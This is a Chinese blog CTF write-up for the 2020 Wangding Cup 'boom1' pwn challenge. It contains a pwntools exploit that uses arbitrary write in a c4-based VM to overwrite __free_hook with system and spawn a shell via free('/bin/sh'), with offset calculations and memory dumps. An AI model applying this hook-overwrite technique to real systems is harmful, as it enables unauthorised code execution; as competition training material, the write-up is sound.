<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.1p0ch.cn","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="网鼎杯？难（P）顶（Y）杯！ 两个vm一个盲打，看到题目👴气得浑身发抖，大热天的全身冷汗，手脚冰凉，这个社会还能不能好了，👴到底要怎样才能签上到，眼泪不争气的流了下来。这比赛到处充斥着对👴的压迫，堆栈题目什么时候才能真正的再次站起来？">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯2020青龙组的复现（pwn部分）">
<meta property="og:url" content="https://www.1p0ch.cn/2020/05/16/%E7%BD%91%E9%BC%8E%E6%9D%AF%E9%9D%92%E9%BE%99%E7%BB%84%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="1p0ch">
<meta property="og:description" content="网鼎杯？难（P）顶（Y）杯！ 两个vm一个盲打，看到题目👴气得浑身发抖，大热天的全身冷汗，手脚冰凉，这个社会还能不能好了，👴到底要怎样才能签上到，眼泪不争气的流了下来。这比赛到处充斥着对👴的压迫，堆栈题目什么时候才能真正的再次站起来？">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-05-16T07:17:31.000Z">
<meta property="article:modified_time" content="2020-05-20T02:59:26.633Z">
<meta property="article:author" content="1p0ch">
<meta property="article:tag" content="网鼎杯2020">
<meta property="article:tag" content="青龙组">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://www.1p0ch.cn/2020/05/16/%E7%BD%91%E9%BC%8E%E6%9D%AF%E9%9D%92%E9%BE%99%E7%BB%84%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>网鼎杯2020青龙组的复现（pwn部分） | 1p0ch</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?3e91822f891be643bcea09697706aabd";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">1p0ch</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-fw fa-link"></i>友链</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-fw fa-sitemap"></i>站点地图</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.1p0ch.cn/2020/05/16/%E7%BD%91%E9%BC%8E%E6%9D%AF%E9%9D%92%E9%BE%99%E7%BB%84%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://q2.qlogo.cn/headimg_dl?dst_uin=765986760&spec=160">
      <meta itemprop="name" content="1p0ch">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="1p0ch">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          网鼎杯2020青龙组的复现（pwn部分）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-05-16 15:17:31" itemprop="dateCreated datePublished" datetime="2020-05-16T15:17:31+08:00">2020-05-16</time>
            </span>
          
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-05-20 10:59:26" itemprop="dateModified" datetime="2020-05-20T10:59:26+08:00">2020-05-20</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/PWN/" itemprop="url" rel="index"><span itemprop="name">PWN</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>网鼎杯？难（P）顶（Y）杯！</p>
<p>两个vm一个盲打，看到题目👴气得浑身发抖，大热天的全身冷汗，手脚冰凉，这个社会还能不能好了，👴到底要怎样才能签上到，眼泪不争气的流了下来。这比赛到处充斥着对👴的压迫，堆栈题目什么时候才能真正的再次站起来？</p>
<a id="more"></a> 

<h3 id="boom1"><a href="#boom1" class="headerlink" title="boom1"></a>boom1</h3><p>这题，vm题。估计出题人从网上扒了<a href="https://github.com/EarlGray/c4/blob/master/c4x86.c" target="_blank" rel="noopener">c4源码</a>然后删删改改成了一道题目。（听说本题坑点在于小版本libc，但是当时👴没做出来，就本地复现一下（ubuntu16））</p>
<p>本题<strong>关键在于</strong>开始的malloc区域过大，是mmap出的空间与libc相邻，导致存在地址任意写。</p>
<p>另外就是，有限制只可以调用一次系统调用，所以本题思路大致两个：</p>
<ul>
<li><p>首先就是地址任意写+一次系统调用getshell，这里方法很多，比如改free_hook或malloc_hook为system，改exit_hook为one_gadget等等。</p>
</li>
<li><p>另一个思路就是改变系统调用次数，然后就可以放飞自我得到flag。</p>
</li>
</ul>
<p>这里我利用得是地址任意写+改free_hook为system后free(‘/bin/sh’)。</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"><span class="comment">#p = remote("182.92.73.10", 24573)</span></span><br><span class="line">p=process(<span class="string">'./pwn'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'ing...\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#calc这里我开始计算偏移的时候拿0x7f40076f1018算的，实际上应该拿0x00007f40076f1010</span></span><br><span class="line"><span class="comment">#s-free_hook=0x148870=1345648</span></span><br><span class="line"><span class="comment">#s-system=0x4c9c88=5020808</span></span><br><span class="line"><span class="comment">#1345648/8=168206</span></span><br><span class="line"><span class="comment">#5020808/8=627601</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#利用0x00007f40076f1010计算的偏移</span></span><br><span class="line"><span class="comment">#1345640/8=168205</span></span><br><span class="line"><span class="comment">#5020800/8=627600</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">'''char *s;int main()&#123;s="1p0ch";*(&amp;s-168205)=&amp;s-627600;free("/bin/sh");&#125;'''</span></span><br><span class="line"><span class="comment">#printf(&amp;s);</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="comment">#addr=u64(p.recv(6).ljust(8,'\x00'))</span></span><br><span class="line"><span class="comment">#print(hex(addr))</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>可以看到，实际上我们的payload只有一句话，但是计算偏移花费了👴几个小时。</p>
<p>首先，要明确一点，就是这个&amp;s-1中的1到底是多少：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#payload&#x3D;&#39;&#39;&#39;char *s;int main()&#123;s&#x3D;&quot;1p0ch&quot;;*(&amp;s+4)&#x3D;&amp;s-1;printf(&amp;(s));&#125;&#39;&#39;&#39;</span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line">0x7f40076f1008:	0x0000000000041002			0x00007f40076f1018(&amp;s)</span><br><span class="line">0x7f40076f1018:	0x0000006863307031(&#39;1p0ch&#39;)	0x0000000000000000</span><br><span class="line">0x7f40076f1028:	0x0000000000000000			0x00007f40076f1008(&amp;s+4)[&amp;s-1]</span><br><span class="line">&#39;&#39;&#39;</span><br></pre></td></tr></table></figure>

<p>这里的（&amp;s-1）中的1<strong>实际上是8*1</strong>，所以<strong>注意计算最后偏移的时候要除以8</strong></p>
<p>这里的指针主要是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x00007f40076f1010--&gt;0x00007f40076f1018--&gt;&#39;1p0ch&#39;</span><br></pre></td></tr></table></figure>

<p>我们使用<code>printf(&amp;(s))</code>打印出来的地址是<code>0x00007f40076f1018</code>，但是利用地址任意写时候的<code>&amp;s</code><strong>实际上是<code>0x00007f40076f1010</code></strong>，所以这里计算到free_hook和system的偏移的时候，注意利用<code>0x00007f40076f1010</code>来计算。</p>
<p>然后看一下我们payload中的<code>*(&amp;s-168205)=&amp;s-627600;</code></p>
<p>实际上就是改写free_hook为system的地址，168205是到free_hook偏移，627600是到system的偏移。</p>
<p>改写后可以发现free_hook以及变成system的地址，然后执行<code>free(&#39;/bin/sh&#39;);</code>实际上就是<code>system(&#39;/bin/sh&#39;);</code></p>

    </div>

    
    
    
        <div class="reward-container">
  <div>好饿啊，早知道不学安全了</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="1p0ch 微信支付">
        <p>微信支付</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BD%91%E9%BC%8E%E6%9D%AF2020/" rel="tag"># 网鼎杯2020</a>
              <a href="/tags/%E9%9D%92%E9%BE%99%E7%BB%84/" rel="tag"># 青龙组</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/05/04/de1ta_ctf%E5%A4%8D%E7%8E%B0_pwn/" rel="prev" title="de1ctf_2020的wp/复现（pwn部分）">
      <i class="fa fa-chevron-left"></i> de1ctf_2020的wp/复现（pwn部分）
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/05/21/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%99%BD%E8%99%8E%E7%BB%84%E5%A4%8D%E7%8E%B0/" rel="next" title="网鼎杯2020白虎组的复现（pwn部分）">
      网鼎杯2020白虎组的复现（pwn部分） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#boom1"><span class="nav-number">1.</span> <span class="nav-text">boom1</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="1p0ch"
      src="https://q2.qlogo.cn/headimg_dl?dst_uin=765986760&spec=160">
  <p class="site-author-name" itemprop="name">1p0ch</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">35</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/1p0ch" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;1p0ch" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:mayedoushidalao@163.com" title="E-Mail → mailto:mayedoushidalao@163.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://wpa.qq.com/msgrd?v=3&uin=765986760&site=qq&menu=yes" title="QQ → https:&#x2F;&#x2F;wpa.qq.com&#x2F;msgrd?v&#x3D;3&amp;uin&#x3D;765986760&amp;site&#x3D;qq&amp;menu&#x3D;yes" rel="noopener" target="_blank"><i class="fa fa-fw fa-qq"></i>QQ</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="http://www.beian.miit.gov.cn/" rel="noopener" target="_blank">浙ICP备20005978号-1 </a>
  </div>

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">1p0ch</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">153k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:19</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>















  

  

</body>
</html>
